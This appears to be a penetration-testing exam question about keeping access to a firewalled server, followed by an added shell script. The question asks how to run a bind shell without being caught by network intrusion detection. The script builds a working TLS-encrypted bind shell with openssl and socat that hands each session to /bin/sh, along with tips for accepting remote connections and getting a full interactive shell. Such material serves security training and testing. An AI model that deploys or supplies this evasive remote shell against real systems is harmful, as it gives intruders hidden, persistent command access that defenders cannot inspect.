As you establish a foothold within a network during an internal penetration test, you've identified a server with a strict outbound firewall policy that prevents reverse shells from connecting to your machine. Your next step is to maintain access with a bind shell. Due to the firewall restrictions, which of the following techniques would allow the compromised server to listen for your connection while minimizing the risk of detection by the network intrusion detection system?
Avoid using a shell by relying solely on periodic command execution to achieve a similar outcome.
Configure the shell to listen on a port such as 4444 that defenders commonly monitor precisely because penetration testing tools default to it.
Wrap the bind shell traffic with SSL and use a port allowed by the firewall policy.
Bind the shell to a common port like 80/http to blend in with normal traffic, relying on the obscurity for protection.
The correct choice is to wrap the bind shell in SSL/TLS and listen on a port the firewall policy permits. The firewall blocks outbound connections, so the compromised server must accept an inbound connection from the tester; a listener on a port the policy already allows inbound (443 is the usual choice) is reachable, while one on an arbitrary port is simply dropped. TLS then encrypts the session, so a network intrusion detection system cannot match signatures against the command strings, prompts and outputs that give away a cleartext shell. Binding to 80 without encryption blends in only superficially: the traffic is in the clear and looks nothing like HTTP, which is exactly what protocol-aware NIDS rules look for. Port 4444 is the default for common penetration testing tooling and is watched for that reason, so it attracts attention rather than deflecting it. Relying on periodic command execution (a scheduled task, for example) avoids a persistent listener but does not give the interactive access the scenario calls for. One caveat a practitioner should keep in mind: TLS hides the content of the session, not its existence. A new service listening on the host, a self-signed certificate with an unusual subject, a TLS fingerprint that does not match a real web server, or a TLS-intercepting proxy can still expose the shell, so encryption reduces the chance of detection rather than eliminating it.
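The following script is an added example, not part of the exam page, showing the correct answer as it is actually typed: a bind shell wrapped in TLS with socat, using a self-signed certificate from openssl, exercised end to end on localhost. Port 8443 is a stand-in for whatever inbound port the target's firewall permits, and the listener is bound to 127.0.0.1 so the demo stays local; both are assumptions, as are the tool names socat and openssl being installed.

```shell
#!/bin/sh
# Added example, not part of the exam page: a TLS-wrapped bind shell built from
# socat and openssl, exercised end to end on localhost. Port 8443 stands in for
# whatever inbound port the target's firewall actually permits (an assumption).
# Only run against systems you are authorised to test.
set -eu

PORT="${PORT:-8443}"
WORKDIR="$(mktemp -d)"
CERT="$WORKDIR/cert.pem"
KEY="$WORKDIR/key.pem"
LISTENER_PID=""

have_tools() {
    command -v socat >/dev/null 2>&1 && command -v openssl >/dev/null 2>&1
}

# Step 1 (on the target): a self-signed certificate for the listener. Any
# certificate gives you encryption; a fresh self-signed one with a generic CN
# is itself an artefact a NIDS or TLS-inspecting proxy can flag.
make_cert() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 7 -subj "/CN=localhost" \
        -keyout "$KEY" -out "$CERT" >/dev/null 2>&1
}

# Step 2 (on the target): listen with TLS and hand each accepted session to
# /bin/sh. verify=0 means the listener does not demand a client certificate;
# bind=127.0.0.1 keeps this demo local (drop it to accept remote connections).
start_listener() {
    socat OPENSSL-LISTEN:"$PORT",bind=127.0.0.1,reuseaddr,fork,cert="$CERT",key="$KEY",verify=0 \
        EXEC:/bin/sh,stderr &
    LISTENER_PID=$!
    # Poll until a TLS handshake succeeds (connection refused until socat binds).
    i=0
    while [ "$i" -lt 20 ]; do
        if printf '' | socat - OPENSSL:127.0.0.1:"$PORT",verify=0 >/dev/null 2>&1; then
            return 0
        fi
        i=$((i + 1))
        sleep 0.25
    done
    return 1
}

# Step 3 (from the tester's machine): connect over TLS, send a command, read
# the reply. verify=0 on the client accepts the self-signed certificate.
run_remote() {
    printf '%s\nexit\n' "$1" | socat - OPENSSL:127.0.0.1:"$PORT",verify=0
}

cleanup() {
    if [ -n "$LISTENER_PID" ]; then
        kill "$LISTENER_PID" 2>/dev/null || true
        LISTENER_PID=""
    fi
    rm -rf "$WORKDIR"
}
trap cleanup EXIT INT TERM

# Full round trip: prints the output of `id` as run inside the bind shell.
demo() {
    have_tools || { echo "socat and openssl are required" >&2; return 1; }
    make_cert
    start_listener
    out="$(run_remote 'id')"
    cleanup
    printf '%s\n' "$out"
}

# Run as:  sh tls_bind_shell.sh demo
if [ "${1:-}" = "demo" ]; then
    demo
fi
```

Without a TLS-capable sniffer in the middle you only see an encrypted stream on an allowed port; capture it with tcpdump while `demo` runs and compare against a plain `socat TCP-LISTEN` version to see the `uid=` string disappear from the wire. For an interactive session on a real engagement, replace `EXEC:/bin/sh,stderr` with `EXEC:/bin/sh,pty,stderr,setsid,sigint,sane` so job control and prompts behave.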